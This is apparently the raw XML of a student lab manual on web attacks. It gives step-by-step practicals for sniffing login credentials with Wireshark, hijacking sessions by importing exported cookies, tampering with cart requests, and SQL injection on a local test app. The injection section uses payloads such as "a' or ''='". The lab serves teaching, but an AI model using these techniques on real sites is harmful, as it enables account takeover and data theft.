        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> tool will keep recording the packets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  <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2514165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881647" cy="2893695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="439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2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47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2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32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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:lastRenderedPageBreak/>
        <w:t>Step 8: Select filter as http to make the search easier and click on apply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176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88177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="441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2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66"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 9: Now stop the tool to stop recording.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2514186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176</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5988177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="443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2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8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60"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="620" w:right="1040" w:bottom="920" w:left="1220" w:header="0" w:footer="73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296621" w:rsidP="008577E0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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4" w:rsidP="008577E0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 10: Find the post methods for username and passwords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196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88177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="445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2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66"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 11: U will see the email- id and password that you used to log in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2514206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176</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5975000" cy="994410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="447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2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D569E9" w:rsidRPr="00D4195F" w:rsidRDefault="00D569E9" w:rsidP="00D569E9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>DOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D569E9" w:rsidRPr="00D4195F" w:rsidRDefault="0029587A" w:rsidP="00D569E9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  <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:pict>
          <v:line id=" 95" o:spid="_x0000_s1084" style="position:absolute;left:0;text-align:left;z-index:252043264;visibility:visible;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" from="70.6pt,718.2pt" to="541.55pt,718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" strokecolor="#a3a3a3">
            <o:lock v:ext="edit" shapetype="f"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:line>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00D569E9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Using NEMESIS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00D569E9" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6337300" cy="2710815"/>
            <wp:effectExtent l="0" t="0" r="635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E9" w:rsidRPr="00D4195F" w:rsidRDefault="00D569E9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D569E9" w:rsidRPr="00D4195F">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1040" w:left="1220" w:header="0" w:footer="73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3347F" w:rsidRDefault="00A3347F" w:rsidP="00A3347F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:right="4258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PRACTICAL NO.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00A3347F" w:rsidRDefault="008577E0" w:rsidP="00A3347F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:right="4258"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">AIM: Simulate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>persistant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED1477" w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross Site </w:t>
      </w:r>
      <w:r w:rsidR="00A3347F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidR="00ED1477" w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Scripting</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED1477" w:rsidRPr="00D4195F" w:rsidRDefault="00ED1477" w:rsidP="00ED1477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5876925" cy="3895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77" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00ED1477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5876925" cy="3676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77" w:rsidRPr="00D4195F" w:rsidRDefault="00ED1477" w:rsidP="00ED1477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E141B2" w:rsidRDefault="00E141B2" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRACTICAL NO. 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3347F" w:rsidRPr="00A3347F" w:rsidRDefault="00A3347F" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00E141B2" w:rsidP="00E141B2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">AIM: </w:t>
      </w:r>
      <w:r w:rsidR="00401CBD" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Session impersonation using Firefox and Tamper Data add-on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>A] Session Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>STEPS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Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>FireFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Go to Tools &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Addons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> &gt; Extension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Search and install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>EditThisCookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> or Cookie Import/Export or any other Cookie tool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>Then Click on Cookie extension to get cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Open a Website and Login and then click on export cookie</w:t>
      </w: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2238375" cy="542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2581275" cy="2971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t>Logout from the webpage once the cookie got exported</w:t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A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:lastRenderedPageBreak/>
        <w:t>Paste the cookie in the tool which you have exported and click on green tick</w:t>
      </w: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4914900" cy="4867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  <w:r w:rsidRPr="00D4195F">
        <w:t>And you are in</w:t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6070600" cy="293878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63221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tamper DATA add-on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr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 xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>FireFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">Go to Tools &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Addons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> &gt; Extension</w:t>
      </w:r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>Search and install Temper Data</w:t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 xml:space="preserve">Select a website for tempering data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>razorba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00363221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5969165" cy="3107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04" cy="31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>Select any item to but</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Then Click to add cart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Then Click on tool for tempering Data</w:t>
      </w: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6016666" cy="314007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179" cy="31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lastRenderedPageBreak/>
        <w:t>Then Start tempering the data</w:t>
      </w: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2790825" cy="2790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>Here you go</w:t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1666875" cy="1228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390B00" w:rsidRPr="00A3347F" w:rsidRDefault="008F220A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PRACTICAL NO. 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00CF4123">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="256"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>AIM: Perform</w:t>
      </w:r>
      <w:r w:rsidR="003D03C4" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidR="003D03C4" w:rsidRPr="00D4195F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr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1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Open XAMPP and start apache and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2514688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5261</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4758369" cy="3108674"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="545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27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369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200"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to web browser and enter site localhost/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>phpmyadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="0029587A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:pict>
          <v:group id=" 180" o:spid="_x0000_s1041" style="position:absolute;margin-left:70.6pt;margin-top:11.95pt;width:470.95pt;height:241.4pt;z-index:251932672;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1412,239" coordsize="9419,4828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">
            <v:line id=" 182" o:spid="_x0000_s1027" style="position:absolute;visibility:visible" from="1412,5059" to="10831,505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" strokecolor="#a3a3a3">
              <o:lock v:ext="edit" shapetype="f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181" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1470;top:239;width:7485;height:475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">
              <v:imagedata r:id="rId75" o:title=""/>
              <v:path arrowok="t"/>
              <o:lock v:ext="edit" aspectratio="f"/>
            </v:shape>
            <w10:wrap type="topAndBottom" anchorx="page"/>
          </v:group>
        </w:pict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76"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="116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3 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Create database with name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>sql_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>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698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218100" cy="3386518"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="547" name="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273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100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Default="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="197"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>4 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">Go </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve">site </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>localhost/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>sql_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>setup.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve">click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">create/reset </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t>database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="197"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2514708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335682" cy="3678459"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="549" name="image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274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682" cy="367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2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6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4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5 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to login.php and login using admin and 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718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32</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5132244" cy="3386518"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="551" name="image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275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244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97"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>6 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Opens the home page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  <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25147289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239889" cy="3678459"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="553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276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889" cy="367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5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20" w:right="1040" w:bottom="128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7 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to security setting option in left and set security level low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132244" cy="3386518"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="555" name="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277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244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97"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>8 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Click on SQL injection option in left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  <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr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123490" cy="3561683"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="557" name="image2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78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490" cy="356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8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9 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Write "1" in text box and click on submit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4971798" cy="3503295"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="559" name="image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27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798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48"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>10 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Write "a' or ''='" in text box and click on submit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F"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939</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4890415" cy="3530917"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="561" name="image2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28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415" cy="3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4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296621" w:rsidP="00D569E9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 xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>11 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Write "1=1" in text box and click on submit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F"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485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5530401" cy="2861214"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="563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28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01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68"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>12 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Write "1*" in text box and click on submit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4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670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5530401" cy="2861214"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
